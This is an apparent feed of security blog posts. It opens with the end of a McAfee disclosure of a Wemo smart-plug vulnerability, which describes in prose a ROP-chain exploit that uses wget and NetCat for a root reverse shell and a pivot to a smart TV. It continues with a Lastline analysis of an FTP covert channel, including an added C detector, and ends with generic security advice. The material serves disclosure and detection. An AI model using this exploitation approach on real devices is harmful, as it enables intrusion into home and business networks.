One way to execute cleanly is to use three well-placed pipes (“|”) inside the payload to stop writing and exit TokenParser at the appropriate time. It is also important to not overwrite the RA pointer so the program can continue normal execution after the packet is received. Then the second packet is sent containing the ROP chain calling system with the address of the parameter written by the previous packet. 

Payload 

With the discovery of a valid ROP chain that can call system, we must decide what system should call. Because system executes as root, we can gain complete control of the device. Our research has shown that the device has many Linux commands installed. We leveraged this earlier with wget to copy gdbserver to the device. An attacker could also call wget from system to download and execute any script. We explored further for installed applications and found NetCat, which could allow an attacker to write a script to create a reverse shell. An attacker could download a script using wget, and execute the script containing a NetCat command to create a reverse shell. We tested and proved this is one simple, effective method, opening a reverse shell as root. Attackers could choose many other methods to leverage this exploit and execute code. The following video demonstrates this exploit working with a reverse shell.

To illustrate, the team wrote an attack scenario. After the plug is compromised, it could use the built-in UPnP library to poke a hole in the network router. This hole creates a backdoor channel for an attacker to connect remotely, unnoticed on the network. In the following video, we used a remote shell to control a TCL smart TV connected to the network. The Roku API implementation on the TV uses simple unencrypted HTTP GET/POST requests to issue commands and does not authenticate the machine sending these commands, making remote control trivial. Using the Wemo as a middleman, the attacker can power the TV on and off, install or uninstall applications, and access arbitrary online content. Smart TVs are just one example of using the Wemo to attack another device. With the attacker having established a foothold on the network and able to open arbitrary ports, any machine connected to the network is at risk. Because attacks can be conducted through the Wemo and the port mappings generated using this exploit are not visible from the router’s administration page, the attacker’s footprint remains small and hard to detect.

Conclusion 

Discoveries such as CVE-2018-6692 underline the importance of secure coding practices on all devices. IoT devices are frequently overlooked from a security perspective; this may be because many are used for seemingly innocuous purposes such as simple home automation. However, these devices run operating systems and require just as much protection as desktop computers. A vulnerability such as we discovered could become the foothold an attacker needs to enter and compromise an entire business network.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post ‘Insight’ into Home Automation Reveals Vulnerability in Simple IoT Product appeared first on McAfee Blogs.

McAfee ePO Platform Gains Insight Into Threat Research

The latest update to the McAfee® ePolicy Orchestrator® platform offers a new add-in to provide insight into the latest analysis carried out by McAfee Labs and the Advanced Threat Research team. The Security Resources section of the McAfee ePO™ console Version 5.10.0 will contain multiple windows providing the latest news.

The first window in the section shows an updated list of the most recent threats research published by the McAfee Labs team. This includes both malware and vulnerability research. For example, this week we released a report that shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. We also include research related to new malware campaigns. All our content is mapped to the MITRE ATT&CK framework and includes all known indicators of compromise, as well as detailing how McAfee products protect against the documented campaign.

Top threats

The section includes a condensed version of the Threat Landscape Dashboard, which contains the top threats across exploit kits, campaigns, ransomware, and vulnerabilities. The following screen shows how the summary will appear in the McAfee ePO console, allowing readers to easily review and click through these threats for more detail.

The latest McAfee ePO console will offer an easy review of analysis gathered by McAfee Labs and the Advanced Threat Research team.

Top stories
Want to know more? The Top Stories section offers the latest information from McAfee news sources, including new product releases and new blog content (beyond threats analysis).

Support and product advisories

At the bottom right of the screen you will find Security Product Advisories:

  • Support Notification Service: McAfee SNS is a proactive notification service that allows McAfee to communicate critical information in a timely manner on product upgrades, releases, and end-of-life notices. SNS is a vital information link during critical incidents, providing you with the updates you need to ensure that your systems and organization are protected.
  • Product Security Bulletins: McAfee is focused on ensuring the security of our customers’ computers, networks, devices, and data. We are committed to rapidly addressing issues as they arise, and providing recommendations through security bulletins and knowledgebase articles.
  • McAfee Labs Security Advisories: These are a free notification service backed by our global research team. McAfee Labs Security Advisories map high-profile threats to the McAfee technologies that protect your environment.

What next?

You can expect the dashboard to evolve and provide more detail in future versions. Please let us know what you would like to see.


The post McAfee ePO Platform Gains Insight Into Threat Research appeared first on McAfee Blogs.

A Wild Port Scan Appears. What now?

Introduction

During the RSA 2018 conference, Lastline launched Breach Defender, a new solution to facilitate the analysis of suspicious anomalies in monitored networks. As part of our internal product QA leading up to any release, we often coordinate with our partners to carry out tests on real data. During our most recent iteration, we happened to detect a port scan within the network of one of our customers (you can see a screenshot of the UI in Figure 1; the orange node represents the event). Normally we tend to gloss over port scans, although we still generate an informational event, as they are often used as part of network security policy to identify hosts running unexpected services. Overall, they are often part of the background noise, and most commonly they are just used to decorate some network activity maps.

Not Your Typical Port Scan

What was unusual in this instance was some additional suspicious activity related to rogue and malformed FTP connections (see the “Suspicious Network Interaction/FTP Based Covert Data Channel” node in Figure 1). Although quite an old protocol, FTP is still frequently used to exfiltrate data (see the HawkEye keylogger, for example). However, a malformed FTP connection can also simply be caused by a poorly implemented client. We quickly ruled out this possibility as soon as we noticed how the events were clearly overlapping and involving the very same internal host that had launched the port scan. As visible from the graph, the very same external hosts were also the target/destination of both the port scan and the malformed FTP connection.

It definitely looked like a local host was actively looking for a way to exfiltrate data.


Figure 1: A port scan initiated by one of the local hosts (highlighted) together with some additional suspicious network interaction exploiting an FTP-based covert data channel.

Analyzing the Traffic

It was definitely time to analyze the traffic in a bit more detail. When we started to dig more in depth into the information at our disposal, more and more suspicious inconsistencies surfaced.

First, as displayed in Figure 2, our heuristics flagged the host as running multiple operating systems. The heuristics build upon network indicators such as user agents or remote endpoints to infer information on the software configuration of each host. The fact that the very same host appears as running two different mobile operating systems (iOS and Android) is unusual and suggests that at least some of the network activities are spoofed. For instance, an iOS application may be hardcoding an Android user agent in its HTTP requests.

Second, the FTP control connection was attempting to store and retrieve the very same file (/home/ftp/db.txt). Note username and password are blank in Figure 2: looking at the raw data, random binary characters appear in those fields, and the characters have been sanitized by our UI. Why would a malicious client want to store and retrieve the same file? Also, the two commands for uploading and downloading are being issued approximately at the same time.

Overall, it felt like something was trying hard to make it look like a legitimate FTP interaction, so we started to suspect we were dealing with something very different. Maybe a clumsy attempt to update a shared resource thereby registering a new infected machine?


Figure 2: Mobile user agents (most likely spoofed) and an anomalous FTP connection that stores and retrieves the very same file.

FTP Traffic

To collect further details related to the FTP connections, we queried our backend and sought to select all connections on port 21 outgoing from the internal host that was under investigation. We found 129 connection attempts (to 129 distinct IPs). Of these, only 13 were successful. Every successful connection translated to similar FTP transactions simultaneously attempting to upload and download a resource with the same name.

A quick check on some of the server IPs revealed that they were still responsive. However, attempting to use a normal FTP client to connect led to strange results: the server responses did not match the commands issued by the client. So rather than using a standard client, we switched to a transport level client (the Linux utility netcat) and attempted to deliver manual commands to the server. We managed to replicate the interaction we saw in Figure 2 using netcat. However, when we tried to introduce some variations, it became obvious that the FTP server dialogue, apparently legitimate, was completely scripted: no matter what input the client provided, the server responses were deterministic and “staged.” Figure 3 shows where we “netcat” into the server and type a bunch of random strings, after which the server replies as if the commands were valid.

Apparently, the client and server somehow “emulated” an FTP control channel to establish a seemingly legitimate bidirectional connection over the data channel. Once again, this behavior seemed to be indicative of an infected host trying to reach out to a C&C server using a stealthy connection.


Figure 3: Regardless of our input, the FTP interaction was always leading to the same result, a bidirectional communication channel opened on a port decided by the server (in this instance 42630 as specified by the “Entering Passive Mode” message, where 166 * 256 + 134 = 42630).

From the perspective of C&C activity, the attempt to store and retrieve the same file via the STOR and RETR commands suddenly opens a potentially reasonable explanation. Passive mode FTP transfers dynamically open data channels on separate network flows, where the server port is dynamically decided by the server. If a stateful firewall is present in the network, it will need to support this by reacting to the control channel interactions and open the associated ports accordingly to allow the transfer. A store and retrieve on the same passive channel can then become an attempt to fool a stateful firewall into allowing bidirectional communication on the port opened by the passive mode.
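An added example, not Lastline’s code: a C check that decodes the passive-mode port exactly as in the Figure 3 arithmetic and flags a control session in which the client both stores and retrieves the same path over a negotiated data channel, which is the pattern a firewall or sensor would want to tie to that port. The “C: ”/“S: ” transcript format and all addresses are constructed (203.0.113.5 is a documentation address); the only page values reused are the port arithmetic and the /home/ftp/db.txt path.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_CMDS 32

/* Parse a "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply. Returns the
 * data-channel port p1*256+p2 (the arithmetic from Figure 3), or -1 if the
 * line is not a well-formed 227 reply. host_out, if given, receives the
 * dotted address the server told the client to connect to (16 bytes). */
int pasv_data_port(const char *reply, char host_out[16])
{
    unsigned h[4], p[2];
    const char *paren = strchr(reply, '(');
    if (strncmp(reply, "227", 3) != 0 || paren == NULL)
        return -1;
    if (sscanf(paren, "(%u,%u,%u,%u,%u,%u)", &h[0], &h[1], &h[2], &h[3], &p[0], &p[1]) != 6)
        return -1;
    for (int i = 0; i < 4; i++)
        if (h[i] > 255)
            return -1;
    if (p[0] > 255 || p[1] > 255)
        return -1;
    if (host_out)
        snprintf(host_out, 16, "%u.%u.%u.%u", h[0], h[1], h[2], h[3]);
    return (int)(p[0] * 256 + p[1]);
}

/* Client commands of one control session, one per entry. Reports whether a
 * STOR and a RETR name the same path (the Figure 2 pattern) and copies that
 * path to path_out. */
int stor_retr_same_path(const char *const *cmds, size_t n, char *path_out, size_t out_len)
{
    for (size_t i = 0; i < n; i++) {
        if (strncmp(cmds[i], "STOR ", 5) != 0)
            continue;
        for (size_t j = 0; j < n; j++) {
            if (strncmp(cmds[j], "RETR ", 5) == 0 && strcmp(cmds[j] + 5, cmds[i] + 5) == 0) {
                if (path_out)
                    snprintf(path_out, out_len, "%s", cmds[i] + 5);
                return 1;
            }
        }
    }
    return 0;
}

/* Session verdict over "C: " / "S: " prefixed control-channel lines (a
 * constructed transcript format). Returns the passive-mode port when the
 * server negotiated a data channel AND the client both stored and retrieved
 * the same path, 0 when the session looks like an ordinary transfer, and -1
 * when no passive data channel was negotiated at all. */
int flag_ftp_covert_channel(const char *const *lines, size_t n, char *path_out, size_t out_len)
{
    const char *cmds[MAX_CMDS];
    size_t ncmds = 0;
    int port = -1;

    for (size_t i = 0; i < n; i++) {
        if (strncmp(lines[i], "C: ", 3) == 0 && ncmds < MAX_CMDS)
            cmds[ncmds++] = lines[i] + 3;
        else if (strncmp(lines[i], "S: ", 3) == 0 && port < 0)
            port = pasv_data_port(lines[i] + 3, NULL);
    }
    if (port < 0)
        return -1;
    return stor_retr_same_path(cmds, ncmds, path_out, out_len) ? port : 0;
}

/* Constructed transcripts: the Figure 2/3 pattern, and an ordinary upload. */
const char *const SCRIPTED_SESSION[] = {
    "S: 220 FTP server ready",
    "C: USER \x01\x02",          /* junk credentials, as in the raw data behind Figure 2 */
    "C: PASS \x7f\x7e",
    "S: 230 Login successful",
    "C: PASV",
    "S: 227 Entering Passive Mode (203,0,113,5,166,134).",
    "C: STOR /home/ftp/db.txt",
    "C: RETR /home/ftp/db.txt",
};
const char *const ORDINARY_SESSION[] = {
    "C: USER backup",
    "C: PASS hunter2",
    "C: PASV",
    "S: 227 Entering Passive Mode (203,0,113,5,8,1).",
    "C: STOR /home/ftp/nightly.tar",
};

int main(void)
{
    char path[64] = "";
    int port = flag_ftp_covert_channel(SCRIPTED_SESSION,
                                       sizeof SCRIPTED_SESSION / sizeof SCRIPTED_SESSION[0],
                                       path, sizeof path);
    printf("scripted session: bidirectional channel on port %d via %s\n", port, path);
    printf("ordinary session: %d\n",
           flag_ftp_covert_channel(ORDINARY_SESSION,
                                   sizeof ORDINARY_SESSION / sizeof ORDINARY_SESSION[0],
                                   path, sizeof path));
    return 0;
}
```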

HTTP Traffic

The FTP traffic was not the only anomaly. Through the Breach Defender user interface in Figure 1 we could pivot to the web requests made during the same time frame by the same host (see Figure 4). We further correlated the extracted web requests with those available in our backend, giving us a total of 293 connection attempts (towards 293 distinct IPs), of which only 15 were successful.


Figure 4: Web requests were sent by the same host that executed the port scan and established the weird FTP control connections.

As shown in Figure 4, the requests were limited to three different hostnames: 8v9m[.]com, www.bing[.]com, and www.intercom[.]com. All web requests were POST, and besides those directed to 8v9m[.]com (which were using a constant and specific path and user agent), each connection was accessing a different resource, each time spoofing the user agent. Not a single DNS resolution was performed for the last two domains. Indeed, despite the HTTP headers indicating connections towards these hosts, the endpoints involved in the interaction were not associated in any way to the hosted infrastructure of these domains.

  • 8v9m.com
    • Path: /ClientApi
    • User-Agent: Go-http-client/1.1
    • Response code: 200
  • www.bing.com
    • Path: 6-char strings (e.g., /r7y9sp, /uhmq3a, /tm5qwn)
    • User-Agent:
      • Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)
      • Mozilla/5.0 (Linux; Android 7.0; SM-G9550 Build/NRD90M)
    • Response code: mostly 4xx
  • www.intercom.com
    • Path: 6-char strings (e.g., /ye4zkv, /8yakfu, /qzgp6c)
    • User-Agent:
      • Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)
      • Mozilla/5.0 (Linux; Android 7.0; SM-G9550 Build/NRD90M)
    • Response code: mostly 4xx

Solving the Mystery

Summarizing the evidence collected so far, we seem to be dealing with something emulating FTP passive transfers and uploading and downloading data across the generated FTP channels, and generating very suspicious HTTP POST requests. This behavior seems clearly deceptive, and the use of these mechanisms for C&C data exfiltration seems a logical conclusion. But how to move the investigation forward?

We proceeded with the investigation by gauging the extent of this behavior and started searching for other endpoints connecting to the same hosts (see Figure 5). It turned out that our original local host was not an isolated case: many other local hosts were exhibiting the very same traffic dynamics, collectively contacting several thousand external IPs, often belonging to the same CIDR blocks.


Figure 5: Graph of web requests towards intercom[.]com and 8v9m[.]com showing how many different hosts were generating the very same requests (and that sometimes more than one host was accessing the same randomly generated path).

This is when we started considering whether the actual culprit was instead a legitimate application; we searched for the domain names extracted when sifting through all the web requests and, as detailed in a public forum here, we were indeed on the right path. The network footprint matches the behavior of a known VPN client (X-VPN) famous for punching holes through corporate firewalls to evade restrictive local network policies.

The first thing such a client does is connect to a set of IPs on ports assigned to common protocols. This is done to find online and reachable servers (which eventually triggered our port scan alert). The reason why the client abuses the FTP protocol by establishing connections resembling C&C channels is twofold: first, even corporate firewalls often allow connections to the FTP control port 21 (most likely for legacy reasons); and second, unlike normal file transfers, the resulting data channels can be established in either direction, allowing bidirectional dialogue-like interactions.

If FTP connections are filtered or dropped, then the client tries several other protocols, including HTTP, fully explaining the web requests directed to the very same hosts. To further evade advanced policy filtering (for example denying specific operating systems and devices) the client goes even further and spoofs the “Host” and “User-Agent” header fields, a fact we saw in Figure 2.

Conclusions

We were definitely amazed by the rather creative way with which modern VPN clients attempt to punch holes through corporate firewalls and attempt to establish a connection regardless of corporate policy. The high volume of data points generated by these connection attempts clearly shows why tracing network events and producing insights from a corporate network can be quite a challenge for a trained network engineer even when the network is bereft of malicious activity.

On the other hand, with the right tools in hand, we have also demonstrated that it is indeed possible to pivot easily across multiple information domains and use that information to differentiate security incidents from mere network anomalies. As we showed in this blog post, increased visibility into network events can often reveal organizational policy violations such as the presence of unexpected or unwanted tools, a common effect of BYOD policies that are only partially enforced.

The post A Wild Port Scan Appears. What now? appeared first on Lastline.

Computer Security Tips: Stay Safe Online

In recent times cyber security has raised the level of awareness and public consciousness as never before. Both large corporations and big organizations try to take care of online security as much as they can. That’s why cyber criminals and hackers have focused more on smaller companies and single entrepreneurs. This awful tendency leads to […]

Your Network Security Is As Important As Locking Your Front Door

Security throughout a company’s network, websites and business dealings has become even more critical than it was just a few years ago; with hackers and criminals trying to break through one’s network security at any given time, both your employees and your customers expect that their secure information will be the highest priority. If an attack or loss of data occurs, it can seriously damage a company’s reputation in the public’s eye, as well as cause employees to question whether their private information is really safe at their job.

Computer network security is an investment that all businesses should make, especially in light of the fact that cybercrime has continued to grow exponentially as a threat to all businesses; this is not limited to businesses located in the United States, but applies worldwide. This type of criminal activity is unlike anything the world has seen before, and many businesses are now recognizing the reality of needing a secure defense against such threats. Smaller businesses can fall prey to these attempts as well, which is why it is critical to invest in a security assessment of one’s current procedures, methods and defenses.

Having a professional organization evaluate your resources for any security leaks or issues can be beneficial for both your short- and long-term interests. A threat analysis is a great way to test your current defenses to discover what kind of data a hacker can currently breach, if any. A penetration test also allows one to assess how a hacker can find ways into your current organization; with a focus not just on a success or failure rating, this test explores all potential outcomes and avenues that a criminal might take. Altogether, investing in this type of assessment is a great idea for your business, whether you are a start-up company or a business with twenty years of experience.

With New Cyber Terror Threats, Investing In Cyber Security Is More Important Than Ever

In our times, network security is the most critical aspect and function of any business; almost all businesses are connected to online data in some way. Even smaller companies such as small music store chains have specific email passwords and critical data that can be easily hacked by criminals. To avoid these types of issues and to eliminate the chances of such security breaches, computer network security should be your number one priority. There are criminals out there unlike any the world has previously witnessed; these are not people who wait to break into your business at night. The modern criminal is rapidly becoming a cyber threat: unseen, unheard and many times unstoppable to those who do not have proper cyber security.

The threat is growing across the world as well; enemies of America and other countries throughout the world are planning more cyber-attacks than ever before. Federal institutions have had their websites targeted and taken over by terror organizations, and the threat continues to grow. It is only a matter of time before terrorist cells see the harm they can cause by targeting the websites of average, everyday businesses and conducting terror operations through the internet and cyberspace. Network security should be more important than ever to every business owner; why take the risk of losing the trust of your customers and employees? Protect your business from the unseen threats in the world, just as you would protect it from physical threats.